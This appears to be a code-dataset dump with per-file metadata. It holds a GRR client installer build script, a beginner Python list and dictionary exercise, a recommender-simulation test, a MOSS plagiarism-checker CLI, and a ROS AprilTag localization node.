elif args.package_format == "rpm":
context = ["Platform:Linux", "Target:LinuxRpm"] + context
builder_obj = builders.CentosClientBuilder
else:
parser.error("Couldn't guess packaging format for: %s" %
platform.linux_distribution()[0])
else:
parser.error("Unsupported build platform: %s" % args.platform)
except AttributeError:
raise RuntimeError("Unable to build for platform %s when running "
"on current platform." % args.platform)
return builder_obj(context=context)
def GetDeployer(context):
"""Get the appropriate client deployer based on the selected flags."""
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
deployer_obj = build.DarwinClientDeployer
elif args.platform == "windows":
context = ["Platform:Windows"] + context
deployer_obj = build.WindowsClientDeployer
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
deployer_obj = build.LinuxClientDeployer
else:
context = ["Platform:Linux", "Target:LinuxRpm"] + context
deployer_obj = build.CentosClientDeployer
else:
parser.error("Unsupported build platform: %s" % args.platform)
return deployer_obj(context=context)
def TemplateInputFilename(context):
"""Build template file name from config."""
if args.templatedir:
filename = config_lib.CONFIG.Get("PyInstaller.template_filename",
context=context)
return os.path.join(args.templatedir, filename)
return None
def BuildAndDeploy(context):
"""Run build and deploy to create installers."""
# ISO 8601 date
timestamp = time.strftime("%Y-%m-%dT%H:%M:%S%z")
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
# Output directory like: 2015-02-13T21:48:47-0800/linux_amd64_deb/
spec = "_".join((args.platform, args.arch, args.package_format))
output_dir = os.path.join(config_lib.CONFIG.Get(
"ClientBuilder.executables_path", context=context), timestamp, spec)
# If we weren't passed a template, build one
if args.template:
template_path = args.template
else:
template_path = os.path.join(output_dir, config_lib.CONFIG.Get(
"PyInstaller.template_filename", context=context))
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate(output_file=template_path)
# Get the list of contexts which we should be building.
context_list = config_lib.CONFIG.Get("ClientBuilder.BuildTargets")
logging.info("Building installers for: %s", context_list)
config_orig = config_lib.CONFIG.ExportState()
deployed_list = []
for deploycontext in context_list:
# Add the settings for this context
for newcontext in deploycontext.split(","):
config_lib.CONFIG.AddContext(newcontext)
context.append(newcontext)
try:
# If the ClientBuilder.target_platforms doesn't match our environment,
# skip.
if not config_lib.CONFIG.MatchBuildContext(args.platform, args.arch,
args.package_format):
continue
deployer = GetDeployer(context)
# Make a nicer filename out of the context string.
context_filename = deploycontext.replace(
"AllPlatforms Context,", "").replace(",", "_").replace(" ", "_")
deployed_list.append(context_filename)
output_filename = os.path.join(
output_dir, context_filename,
config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context))
logging.info("Deploying %s as %s with labels: %s", deploycontext,
config_lib.CONFIG.Get(
"Client.name", context=deployer.context),
config_lib.CONFIG.Get(
"Client.labels", context=deployer.context))
deployer.MakeDeployableBinary(template_path, output_filename)
finally:
# Remove the custom settings for the next deploy
for newcontext in deploycontext.split(","):
context.remove(newcontext)
config_lib.ImportConfigManger(config_orig)
logging.info("Complete, installers for %s are in %s", deployed_list,
output_dir)
def main(_):
"""Launch the appropriate builder."""
config_lib.CONFIG.AddContext(
"ClientBuilder Context",
"Context applied when we run the client builder script.")
startup.ClientInit()
# Make sure we have all the secondary configs since they may be set under the
# ClientBuilder Context
for secondconfig in config_lib.CONFIG["ConfigIncludes"]:
config_lib.CONFIG.LoadSecondaryConfig(secondconfig)
# Use basic console output logging so we can see what is happening.
logger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
logger.handlers = [handler]
# The following is used to change the identity of the builder based on the
# target platform.
context = flags.FLAGS.context
if args.arch == "amd64":
context.append("Arch:amd64")
else:
context.append("Arch:i386")
if args.subparser_name == "build":
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate()
elif args.subparser_name == "repack":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
output_filename = os.path.join(
args.outputdir, config_lib.CONFIG.Get(
"ClientBuilder.output_filename", context=deployer.context))
deployer.RepackInstaller(open(args.template, "rb").read(), args.output or
output_filename)
elif args.subparser_name == "deploy":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
template_path = (args.template or TemplateInputFilename(deployer.context) or
config_lib.CONFIG.Get("ClientBuilder.template_path",
context=deployer.context))
# If neither output filename or output directory is specified,
# use the default location from the config file.
output = None
if args.output:
output = args.output
elif args.outputdir:
# If output filename isn't specified, write to args.outputdir with a
# .deployed extension so we can distinguish it from repacked binaries.
filename = ".".join(
(config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context), "deployed"))
output = os.path.join(args.outputdir, filename)
deployer.MakeDeployableBinary(template_path, output)
elif args.subparser_name == "buildanddeploy":
BuildAndDeploy(context)
if __name__ == "__main__":
flags.StartMain(main)
| en | 0.851849 | #!/usr/bin/env python This tool builds or repacks the client binaries. This handles invocations for the build across the supported platforms including handling Visual Studio, pyinstaller and other packaging mechanisms. # pylint: disable=unused-import # pylint: enable=unused-import # Guess which arch we should be building based on where we are running. # Guess which package format we should be building based on where we are # running. # Initialize sub parsers and their arguments. # Build arguments. Get the appropriate builder based on the selected flags. Get the appropriate client deployer based on the selected flags. Build template file name from config. Run build and deploy to create installers. # ISO 8601 date # Output directory like: 2015-02-13T21:48:47-0800/linux_amd64_deb/ # If we weren't passed a template, build one # Get the list of contexts which we should be building. # Add the settings for this context # If the ClientBuilder.target_platforms doesn't match our environment, # skip. # Make a nicer filename out of the context string. # Remove the custom settings for the next deploy Launch the appropriate builder. # Make sure we have all the secondary configs since they may be set under the # ClientBuilder Context # Use basic console output logging so we can see what is happening. # The following is used to change the identity of the builder based on the # target platform. # If neither output filename or output directory is specified, # use the default location from the config file. # If output filename isn't specified, write to args.outputdir with a # .deployed extension so we can distinguish it from repacked binaries. | 2.3135 | 2 |
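For reference, a standalone sketch (no GRR imports; the path and values here are invented) of the output-directory layout that BuildAndDeploy above constructs from the timestamp and the platform/arch/package spec:

import os
import time

def output_dir_for(executables_path, platform, arch, package_format):
    # Mirrors BuildAndDeploy: <executables_path>/<ISO 8601 timestamp>/<platform_arch_format>
    timestamp = time.strftime("%Y-%m-%dT%H:%M:%S%z")
    spec = "_".join((platform, arch, package_format))
    return os.path.join(executables_path, timestamp, spec)

# e.g. /tmp/executables/2015-02-13T21:48:47-0800/linux_amd64_deb
print(output_dir_for("/tmp/executables", "linux", "amd64", "deb"))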
Greyatom-projects/code.py | naveena41/greyatom-python-for-data-science | 0 | 8055 | <gh_stars>0
# --------------
# Code starts here
# Create the lists
class_1 = ['<NAME>', '<NAME>', '<NAME>', '<NAME>']
class_2 = ['<NAME>', '<NAME>', '<NAME>']
# Concatenate both the lists
new_class = class_1+class_2
print(new_class)
# Append the list
new_class.append('<NAME>')
# Print updated list
print(new_class)
# Remove the element from the list
new_class.remove('<NAME>')
# Print the list
print(new_class)
# Create the Dictionary
courses = {"math": 65, "english": 70, "history": 80, "french": 70, "science":60}
# Add up the marks of all the subjects and store the result in a variable
total = 65+70+80+70+60
print(total)
# Store the total for all the subjects in the variable `total`
# Print the total
# Insert percentage formula
percentage = float(total) * (100 / 500)
# Print the percentage
print(percentage)
# Create the Dictionary
mathematics = {"<NAME>" :78, "<NAME>" :95, "<NAME>" :65, "<NAME>" :50, "<NAME>" :70, "<NAME>" :66, "<NAME>" :75}
topper = max(mathematics,key = mathematics.get)
print(topper)
# Given string
print(topper.split())
# Create variable first_name
first_name = 'andrew'
# Create variable Last_name and store the last name in it
Last_name ='ng'
# Concatenate the string
full_name = Last_name+' '+first_name
# print the full_name
print(full_name)
# print the name in upper case
certificate_name = full_name.upper()
print(certificate_name)
# Code ends here
| # --------------
# Code starts here
# Create the lists
class_1 = ['<NAME>', '<NAME>', '<NAME>', '<NAME>']
class_2 = ['<NAME>', '<NAME>', '<NAME>']
# Concatenate both the lists
new_class = class_1+class_2
print(new_class)
# Append the list
new_class.append('<NAME>')
# Print updated list
print(new_class)
# Remove the element from the list
new_class.remove('<NAME>')
# Print the list
print(new_class)
# Create the Dictionary
courses = {"math": 65, "english": 70, "history": 80, "french": 70, "science":60}
# Add up the marks of all the subjects and store the result in a variable
total = 65+70+80+70+60
print(total)
# Store the total for all the subjects in the variable `total`
# Print the total
# Insert percentage formula
percentage = float(total) * (100 / 500)
# Print the percentage
print(percentage)
# Create the Dictionary
mathematics = {"<NAME>" :78, "<NAME>" :95, "<NAME>" :65, "<NAME>" :50, "<NAME>" :70, "<NAME>" :66, "<NAME>" :75}
topper = max(mathematics,key = mathematics.get)
print(topper)
# Given string
print(topper.split())
# Create variable first_name
first_name = 'andrew'
# Create variable Last_name and store the last name in it
Last_name ='ng'
# Concatenate the string
full_name = Last_name+' '+first_name
# print the full_name
print(full_name)
# print the name in upper case
certificate_name = full_name.upper()
print(certificate_name)
# Code ends here | en | 0.597958 | # -------------- # Code starts here # Create the lists # Concatenate both the strings # Append the list # Print updated list # Remove the element from the list # Print the list # Create the Dictionary # Slice the dict and stores the all subjects marks in variable # Store the all the subject in one variable `Total` # Print the total # Insert percentage formula # Print the percentage # Create the Dictionary # Given string # Create variable first_name # Create variable Last_name and store last two element in the list # Concatenate the string # print the full_name # print the name in upper case # Code ends here | 4.204773 | 4 |
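A more idiomatic sketch of the same calculations as the snippet above (the marks are the ones from the snippet; the student names are placeholders, since the original anonymizes them as <NAME>):

courses = {"math": 65, "english": 70, "history": 80, "french": 70, "science": 60}
total = sum(courses.values())          # 345, instead of hard-coding 65+70+80+70+60
percentage = total * 100 / 500         # 69.0

mathematics = {"Student A": 78, "Student B": 95, "Student C": 65}  # placeholder names
topper = max(mathematics, key=mathematics.get)                     # "Student B"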
environments/recommenders/recsim_wrapper_test.py | jackblandin/ml-fairness-gym | 0 | 8056 | # coding=utf-8
# Copyright 2022 The ML Fairness Gym Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for recsim.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import test_util
from environments.recommenders import recsim_wrapper
from recsim.environments import interest_exploration
class RecommenderTest(absltest.TestCase):
def test_interest_exploration_can_run(self):
env_config = {
'num_candidates': 5,
'slate_size': 2,
'resample_documents': False,
'seed': 100,
}
params = recsim_wrapper.Params(
recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)
test_util.run_test_simulation(env=env, stackelberg=True)
def test_interest_exploration_can_run_with_resampling(self):
env_config = {
'num_candidates': 5,
'slate_size': 2,
'resample_documents': True,
'seed': 100,
}
params = recsim_wrapper.Params(
recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)
test_util.run_test_simulation(env=env, stackelberg=True)
if __name__ == '__main__':
absltest.main()
| # coding=utf-8
# Copyright 2022 The ML Fairness Gym Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for recsim.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import test_util
from environments.recommenders import recsim_wrapper
from recsim.environments import interest_exploration
class RecommenderTest(absltest.TestCase):
def test_interest_exploration_can_run(self):
env_config = {
'num_candidates': 5,
'slate_size': 2,
'resample_documents': False,
'seed': 100,
}
params = recsim_wrapper.Params(
recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)
test_util.run_test_simulation(env=env, stackelberg=True)
def test_interest_exploration_can_run_with_resampling(self):
env_config = {
'num_candidates': 5,
'slate_size': 2,
'resample_documents': True,
'seed': 100,
}
params = recsim_wrapper.Params(
recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)
test_util.run_test_simulation(env=env, stackelberg=True)
if __name__ == '__main__':
absltest.main()
| en | 0.839689 | # coding=utf-8 # Copyright 2022 The ML Fairness Gym Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 Tests for recsim.py. | 2.011801 | 2 |
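The wrapping pattern that both tests above exercise, shown once in isolation (Params, RecsimWrapper and create_environment come from the imports in the file; the config values here are arbitrary):

from environments.recommenders import recsim_wrapper
from recsim.environments import interest_exploration

env_config = {'num_candidates': 10, 'slate_size': 3, 'resample_documents': False, 'seed': 7}
params = recsim_wrapper.Params(
    recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)  # this wrapped env is what test_util.run_test_simulation drives above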
moss_client_cli.py | mernst32/dl-searchcode-code | 0 | 8057 | import argparse
import csv
import os
from moss_client.core import submit_and_dl, parse_moss_reports
data_folder = 'data'
def handle_input(user_id, base_folder, parse, only_parse, join_file, batch):
global data_folder
abs_path = os.path.abspath(os.path.dirname(__file__))
root_data_folder = os.path.join(abs_path, data_folder)
if not os.path.exists(root_data_folder):
os.makedirs(root_data_folder)
report_links_file = os.path.join(root_data_folder, 'links_to_moss_reports.html')
report_csv_file = os.path.join(root_data_folder, 'moss_report.csv')
if not os.path.isabs(base_folder):
base_folder = os.path.join(abs_path, base_folder)
if len(join_file) > 0:
expected_keys = ["SC_Filepath", "Stackoverflow_Links"]
with open(join_file, mode='r', encoding='utf-8') as csv_file:
csv_reader = csv.DictReader(csv_file)
actual_keys = csv_reader.fieldnames
if expected_keys[0] != actual_keys[0] or expected_keys[1] != actual_keys[1]:
print("Error: Unexpected Headers! SC_Filepath and Stackoverflow_Links are required!")
return -1
if not only_parse:
submit_and_dl(user_id, base_folder, report_links_file, batch)
if parse or only_parse:
print("Parsing the moss reports...")
parse_moss_reports(report_links_file, report_csv_file, join_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="MOSS CLI client for submitting java files to the service and downloading the report from the "
"service locally. Will go through the sub folders of the given folder and submit the java files "
"for plagiarism checks and download the reports locally, creating a linking file in the process")
parser.add_argument('user_id', metavar='U', nargs=1, help="Your user-id for the MOSS service.")
parser.add_argument('folder', metavar='F', nargs=1, help="The folder whose contents you want to submit.")
parser.add_argument('-p', '--parse', action='store_true', help="Parses the moss reports into a csv file.")
parser.add_argument('-o', '--only-parse', action='store_true',
help="Only parses the local moss reports and does not submit files and download the reports. "
"Requires the reports and the links_to_reports html file created normally by this app.")
parser.add_argument('-j', '--join-file', nargs=1, default=[""],
help="When the parse or only-parse option is given, joins the parsed MOSS data with the data from this CSV file.")
parser.add_argument('-b', '--batch-mode', action='store_true',
help="Only submits 100 folders to the Moss Service at a time, and also looks for already processed folders so "
"that it does not submit those again.")
args = parser.parse_args()
handle_input(args.user_id[0], args.folder[0], args.parse, args.only_parse, args.join_file[0], args.batch_mode)
| import argparse
import csv
import os
from moss_client.core import submit_and_dl, parse_moss_reports
data_folder = 'data'
def handle_input(user_id, base_folder, parse, only_parse, join_file, batch):
global data_folder
abs_path = os.path.abspath(os.path.dirname(__file__))
root_data_folder = os.path.join(abs_path, data_folder)
if not os.path.exists(root_data_folder):
os.makedirs(root_data_folder)
report_links_file = os.path.join(root_data_folder, 'links_to_moss_reports.html')
report_csv_file = os.path.join(root_data_folder, 'moss_report.csv')
if not os.path.isabs(base_folder):
base_folder = os.path.join(abs_path, base_folder)
if len(join_file) > 0:
expected_keys = ["SC_Filepath", "Stackoverflow_Links"]
with open(join_file, mode='r', encoding='utf-8') as csv_file:
csv_reader = csv.DictReader(csv_file)
actual_keys = csv_reader.fieldnames
if expected_keys[0] != actual_keys[0] or expected_keys[1] != actual_keys[1]:
print("Error: Unexpected Headers! SC_Filepath and Stackoverflow_Links are required!")
return -1
if not only_parse:
submit_and_dl(user_id, base_folder, report_links_file, batch)
if parse or only_parse:
print("Parsing the moss reports...")
parse_moss_reports(report_links_file, report_csv_file, join_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="MOSS CLI client for submitting java files to the service and downloading the report from the "
"service locally. Will go through the sub folders of the given folder and submit the java files "
"for plagiarism checks and download the reports locally, creating a linking file in the process")
parser.add_argument('user_id', metavar='U', nargs=1, help="Your user-id for the MOSS service.")
parser.add_argument('folder', metavar='F', nargs=1, help="The folder whose contents you want to submit.")
parser.add_argument('-p', '--parse', action='store_true', help="Parses the moss reports into a csv file.")
parser.add_argument('-o', '--only-parse', action='store_true',
help="Only parses the local moss reports and does not submit files and download the reports. "
"Requires the reports and the links_to_reports html file created normally by this app.")
parser.add_argument('-j', '--join-file', nargs=1, default=[""],
help="When the parse or only-parse option is given, joins the parsed MOSS data with the data from this CSV file.")
parser.add_argument('-b', '--batch-mode', action='store_true',
help="Only submits 100 folders to the Moss Service at a time, and also looks for already processed folders so "
"that it does not submit those again.")
args = parser.parse_args()
handle_input(args.user_id[0], args.folder[0], args.parse, args.only_parse, args.join_file[0], args.batch_mode)
| none | 1 | 2.836682 | 3 |
|
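Hypothetical invocations of the CLI defined above (the user id, folder name and CSV file are made up):

# Submit ./submissions, parse the downloaded reports, and join them with an existing CSV:
#   python moss_client_cli.py 123456789 submissions --parse --join-file so_links.csv
# Re-parse already-downloaded reports only:
#   python moss_client_cli.py 123456789 submissions --only-parse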
catkin_ws/src/localization/src/localization_node.py | DiegoOrtegoP/Software | 12 | 8058 | <gh_stars>10-100
#!/usr/bin/env python
import rospy
#from apriltags_ros.msg import AprilTagDetectionArray
from duckietown_msgs.msg import AprilTagsWithInfos
import tf2_ros
from tf2_msgs.msg import TFMessage
import tf.transformations as tr
from geometry_msgs.msg import Transform, TransformStamped
import numpy as np
from localization import PoseAverage
from visualization_msgs.msg import Marker
# Localization Node
# Author: <NAME>
# Inputs: apriltags/duckietown_msgs/AprilTags - A list of april tags in a camera frame
# Outputs: pose2d/duckietown_msgs/Pose2dStamped - The estimated pose of the robot in the world frame in 2D coordinates
# pose3d/geometry_msgs/PoseStamped - The estimated pose of the robot in the world frame in 3D coordinates
class LocalizationNode(object):
def __init__(self):
self.node_name = 'localization_node'
# Constants
self.world_frame = "world"
self.duckiebot_frame = "duckiebot"
self.duckiebot_lifetime = self.setupParam("~duckiebot_lifetime", 5) # The number of seconds to keep the duckiebot alive bewtween detections
self.highlight_lifetime = self.setupParam("~highlight_lifetime", 3) # The number of seconds to keep a sign highlighted after a detection
# Setup the publishers and subscribers
self.sub_april = rospy.Subscriber("~apriltags", AprilTagsWithInfos, self.tag_callback)
self.pub_tf = rospy.Publisher("/tf", TFMessage, queue_size=1, latch=True)
self.pub_rviz = rospy.Publisher("/sign_highlights", Marker, queue_size=1, latch=True)
# Setup the transform listener
self.tfbuf = tf2_ros.Buffer()
self.tfl = tf2_ros.TransformListener(self.tfbuf)
# Use a timer to make the duckiebot disappear
self.lifetimer = rospy.Time.now()
self.publish_duckie_marker()
rospy.loginfo("[%s] has started", self.node_name)
def tag_callback(self, msg_tag):
# Listen for the transform of the tag in the world
avg = PoseAverage.PoseAverage()
for tag in msg_tag.detections:
try:
Tt_w = self.tfbuf.lookup_transform(self.world_frame, "tag_{id}".format(id=tag.id), rospy.Time(), rospy.Duration(1))
Mtbase_w=self.transform_to_matrix(Tt_w.transform)
Mt_tbase = tr.concatenate_matrices(tr.translation_matrix((0,0,0.17)), tr.euler_matrix(0,0,np.pi))
Mt_w = tr.concatenate_matrices(Mtbase_w,Mt_tbase)
Mt_r=self.pose_to_matrix(tag.pose)
Mr_t=np.linalg.inv(Mt_r)
Mr_w=np.dot(Mt_w,Mr_t)
Tr_w = self.matrix_to_transform(Mr_w)
avg.add_pose(Tr_w)
self.publish_sign_highlight(tag.id)
except(tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException) as ex:
rospy.logwarn("Error looking up transform for tag_%s", tag.id)
rospy.logwarn(ex.message)
Tr_w = avg.get_average() # Average of the opinions
# Broadcast the robot transform
if Tr_w is not None:
# Set the z translation, and x and y rotations to 0
Tr_w.translation.z = 0
rot = Tr_w.rotation
rotz=tr.euler_from_quaternion((rot.x, rot.y, rot.z, rot.w))[2]
(rot.x, rot.y, rot.z, rot.w) = tr.quaternion_from_euler(0, 0, rotz)
T = TransformStamped()
T.transform = Tr_w
T.header.frame_id = self.world_frame
T.header.stamp = rospy.Time.now()
T.child_frame_id = self.duckiebot_frame
self.pub_tf.publish(TFMessage([T]))
self.lifetimer = rospy.Time.now()
def publish_duckie_marker(self):
# Publish a duckiebot transform far away unless the timer was reset
rate = rospy.Rate(10)
while not rospy.is_shutdown():
rate.sleep()
if rospy.Time.now() - self.lifetimer > rospy.Duration(self.duckiebot_lifetime):
T = TransformStamped()
T.transform.translation.z = 1000 # Throw it 1km in the air
T.transform.rotation.w = 1
T.header.frame_id = self.world_frame
T.header.stamp = rospy.Time.now()
T.child_frame_id = self.duckiebot_frame
self.pub_tf.publish(TFMessage([T]))
def publish_sign_highlight(self, id):
# Publish a highlight marker on the sign that is seen by the robot
m = Marker()
m.header.frame_id="tag_{id}".format(id=id)
m.header.stamp = rospy.Time.now()
m.id=id
m.lifetime = rospy.Duration(self.highlight_lifetime)
m.type = Marker.CYLINDER
p = m.pose.position
o = m.pose.orientation
c = m.color
s = m.scale
s.x, s.y, s.z = (0.1, 0.1, 0.3)
p.z = 0.15
c.a, c.r, c.g, c.b = (0.2, 0.9, 0.9, 0.0)
o.w = 1
self.pub_rviz.publish(m)
def pose_to_matrix(self, p):
# Return the 4x4 homogeneous matrix for a PoseStamped.msg p from the geometry_msgs
trans = (p.pose.position.x, p.pose.position.y, p.pose.position.z)
rot = (p.pose.orientation.x, p.pose.orientation.y, p.pose.orientation.z, p.pose.orientation.w)
return np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
def transform_to_matrix(self, T):
# Return the 4x4 homogeneous matrix for a TransformStamped.msg T from the geometry_msgs
trans = (T.translation.x, T.translation.y, T.translation.z)
rot = (T.rotation.x, T.rotation.y, T.rotation.z, T.rotation.w)
return np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
def matrix_to_transform(self, M):
# Return a TransformStamped.msg T from the geometry_msgs from a 4x4 homogeneous matrix
T=Transform()
(T.translation.x, T.translation.y, T.translation.z) = tr.translation_from_matrix(M)
(T.rotation.x, T.rotation.y, T.rotation.z, T.rotation.w) = tr.quaternion_from_matrix(M)
return T
def setupParam(self, param_name, default_value):
value = rospy.get_param(param_name, default_value)
rospy.set_param(param_name, value) #Write to parameter server for transparancy
rospy.loginfo("[%s] %s = %s " % (self.node_name, param_name, value))
return value
if __name__ == '__main__':
rospy.init_node('localization_node', anonymous=False)
localization_node = LocalizationNode()
rospy.spin()
| #!/usr/bin/env python
import rospy
#from apriltags_ros.msg import AprilTagDetectionArray
from duckietown_msgs.msg import AprilTagsWithInfos
import tf2_ros
from tf2_msgs.msg import TFMessage
import tf.transformations as tr
from geometry_msgs.msg import Transform, TransformStamped
import numpy as np
from localization import PoseAverage
from visualization_msgs.msg import Marker
# Localization Node
# Author: <NAME>
# Inputs: apriltags/duckietown_msgs/AprilTags - A list of april tags in a camera frame
# Outputs: pose2d/duckietown_msgs/Pose2dStamped - The estimated pose of the robot in the world frame in 2D coordinates
# pose3d/geometry_msgs/PoseStamped - The estimated pose of the robot in the world frame in 3D coordinates
class LocalizationNode(object):
def __init__(self):
self.node_name = 'localization_node'
# Constants
self.world_frame = "world"
self.duckiebot_frame = "duckiebot"
self.duckiebot_lifetime = self.setupParam("~duckiebot_lifetime", 5) # The number of seconds to keep the duckiebot alive bewtween detections
self.highlight_lifetime = self.setupParam("~highlight_lifetime", 3) # The number of seconds to keep a sign highlighted after a detection
# Setup the publishers and subscribers
self.sub_april = rospy.Subscriber("~apriltags", AprilTagsWithInfos, self.tag_callback)
self.pub_tf = rospy.Publisher("/tf", TFMessage, queue_size=1, latch=True)
self.pub_rviz = rospy.Publisher("/sign_highlights", Marker, queue_size=1, latch=True)
# Setup the transform listener
self.tfbuf = tf2_ros.Buffer()
self.tfl = tf2_ros.TransformListener(self.tfbuf)
# Use a timer to make the duckiebot disappear
self.lifetimer = rospy.Time.now()
self.publish_duckie_marker()
rospy.loginfo("[%s] has started", self.node_name)
def tag_callback(self, msg_tag):
# Listen for the transform of the tag in the world
avg = PoseAverage.PoseAverage()
for tag in msg_tag.detections:
try:
Tt_w = self.tfbuf.lookup_transform(self.world_frame, "tag_{id}".format(id=tag.id), rospy.Time(), rospy.Duration(1))
Mtbase_w=self.transform_to_matrix(Tt_w.transform)
Mt_tbase = tr.concatenate_matrices(tr.translation_matrix((0,0,0.17)), tr.euler_matrix(0,0,np.pi))
Mt_w = tr.concatenate_matrices(Mtbase_w,Mt_tbase)
Mt_r=self.pose_to_matrix(tag.pose)
Mr_t=np.linalg.inv(Mt_r)
Mr_w=np.dot(Mt_w,Mr_t)
Tr_w = self.matrix_to_transform(Mr_w)
avg.add_pose(Tr_w)
self.publish_sign_highlight(tag.id)
except(tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException) as ex:
rospy.logwarn("Error looking up transform for tag_%s", tag.id)
rospy.logwarn(ex.message)
Tr_w = avg.get_average() # Average of the opinions
# Broadcast the robot transform
if Tr_w is not None:
# Set the z translation, and x and y rotations to 0
Tr_w.translation.z = 0
rot = Tr_w.rotation
rotz=tr.euler_from_quaternion((rot.x, rot.y, rot.z, rot.w))[2]
(rot.x, rot.y, rot.z, rot.w) = tr.quaternion_from_euler(0, 0, rotz)
T = TransformStamped()
T.transform = Tr_w
T.header.frame_id = self.world_frame
T.header.stamp = rospy.Time.now()
T.child_frame_id = self.duckiebot_frame
self.pub_tf.publish(TFMessage([T]))
self.lifetimer = rospy.Time.now()
def publish_duckie_marker(self):
# Publish a duckiebot transform far away unless the timer was reset
rate = rospy.Rate(10)
while not rospy.is_shutdown():
rate.sleep()
if rospy.Time.now() - self.lifetimer > rospy.Duration(self.duckiebot_lifetime):
T = TransformStamped()
T.transform.translation.z = 1000 # Throw it 1km in the air
T.transform.rotation.w = 1
T.header.frame_id = self.world_frame
T.header.stamp = rospy.Time.now()
T.child_frame_id = self.duckiebot_frame
self.pub_tf.publish(TFMessage([T]))
def publish_sign_highlight(self, id):
# Publish a highlight marker on the sign that is seen by the robot
m = Marker()
m.header.frame_id="tag_{id}".format(id=id)
m.header.stamp = rospy.Time.now()
m.id=id
m.lifetime = rospy.Duration(self.highlight_lifetime)
m.type = Marker.CYLINDER
p = m.pose.position
o = m.pose.orientation
c = m.color
s = m.scale
s.x, s.y, s.z = (0.1, 0.1, 0.3)
p.z = 0.15
c.a, c.r, c.g, c.b = (0.2, 0.9, 0.9, 0.0)
o.w = 1
self.pub_rviz.publish(m)
def pose_to_matrix(self, p):
# Return the 4x4 homogeneous matrix for a PoseStamped.msg p from the geometry_msgs
trans = (p.pose.position.x, p.pose.position.y, p.pose.position.z)
rot = (p.pose.orientation.x, p.pose.orientation.y, p.pose.orientation.z, p.pose.orientation.w)
return np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
def transform_to_matrix(self, T):
# Return the 4x4 homogeneous matrix for a TransformStamped.msg T from the geometry_msgs
trans = (T.translation.x, T.translation.y, T.translation.z)
rot = (T.rotation.x, T.rotation.y, T.rotation.z, T.rotation.w)
return np.dot(tr.translation_matrix(trans), tr.quaternion_matrix(rot))
def matrix_to_transform(self, M):
# Return a TransformStamped.msg T from the geometry_msgs from a 4x4 homogeneous matrix
T=Transform()
(T.translation.x, T.translation.y, T.translation.z) = tr.translation_from_matrix(M)
(T.rotation.x, T.rotation.y, T.rotation.z, T.rotation.w) = tr.quaternion_from_matrix(M)
return T
def setupParam(self, param_name, default_value):
value = rospy.get_param(param_name, default_value)
rospy.set_param(param_name, value) #Write to parameter server for transparancy
rospy.loginfo("[%s] %s = %s " % (self.node_name, param_name, value))
return value
if __name__ == '__main__':
rospy.init_node('localization_node', anonymous=False)
localization_node = LocalizationNode()
rospy.spin() | en | 0.696005 | #!/usr/bin/env python #from apriltags_ros.msg import AprilTagDetectionArray # Localization Node # Author: <NAME> # Inputs: apriltags/duckietown_msgs/AprilTags - A list of april tags in a camera frame # Outputs: pose2d/duckietown_msgs/Pose2dStamped - The estimated pose of the robot in the world frame in 2D coordinates # pose3d/geometry_msgs/PoseStamped - The estimated pose of the robot in the world frame in 3D coordinates # Constants # The number of seconds to keep the duckiebot alive bewtween detections # The number of seconds to keep a sign highlighted after a detection # Setup the publishers and subscribers # Setup the transform listener # Use a timer to make the duckiebot disappear # Listen for the transform of the tag in the world # Average of the opinions # Broadcast the robot transform # Set the z translation, and x and y rotations to 0 # Publish a duckiebot transform far away unless the timer was reset # Throw it 1km in the air # Publish a highlight marker on the sign that is seen by the robot # Return the 4x4 homogeneous matrix for a PoseStamped.msg p from the geometry_msgs # Return the 4x4 homogeneous matrix for a TransformStamped.msg T from the geometry_msgs # Return a TransformStamped.msg T from the geometry_msgs from a 4x4 